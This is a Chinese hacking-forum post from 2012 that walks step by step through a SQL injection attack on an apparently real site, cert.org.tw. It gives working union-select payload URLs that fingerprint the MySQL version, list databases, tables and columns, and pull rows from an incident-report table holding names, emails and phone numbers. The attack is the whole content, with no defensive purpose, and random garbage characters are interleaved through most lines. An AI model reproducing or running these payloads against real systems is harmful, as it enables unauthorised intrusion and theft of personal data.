找回密码
 立即注册
查看: 2472|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
+ |  B5 O* z% n( _% E) R0 Q2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
" R+ M: J# L6 D) B6 Mhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--. d% H, Y& s( o: z8 m" B1 f
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
( p  r- b! j' l* z数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
( @9 g  s, ?* r4.判断有没有写权限8 x& z1 n1 m) b% U/ H
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
# W2 K) N7 ]- {" M1 x# \没办法,手动猜表啦) X" s2 u( R9 v, \
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,17 a* P: N3 o+ o* M9 T) l
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
: G8 I- j* j% L0 V/ Shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--% s8 G* N: D$ x9 i
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
/ W) ]- Z" W- x* T3 o: `& Minformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb/ C" k5 I+ l% N
6.爆表,爆的是twcert库
1 g! j3 p) m. j& g2 \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--+ n( M. K6 A3 K$ p/ v& G$ i  |1 q! ]
爆出如下表; e, O5 t2 m6 _! t2 j% k6 \
downloadfile,irsys,newsdata,secrpt,secrpt_big5" h: M5 @# e: @' u8 M* [% e
7.爆列名,这次爆的是irsys表
4 x& b4 z7 j+ ?3 [8 H6 t1 shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
7 d: f7 U9 @+ ]" P爆出如下列
6 y" r% }2 ^& p  v9 U- g' Eir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
5 [5 o; ^  u. s# ?( v0 V8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。! L" K) l  Q9 L1 D  M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
/ g7 R& J* s7 z# m0 i* n返回是3,说明每个列里有3个地段0 x; b) M& p+ a" j& F" R  ^
9.爆字段内容
% H% `& `8 ^+ h( w+ y& X5 }http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--. T5 |( g8 O# G
爆出name列的第一个字段的内容+ }" \, X& }& d$ ^3 H" J
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
1 T1 l6 W6 I& q- P5 p5 |爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表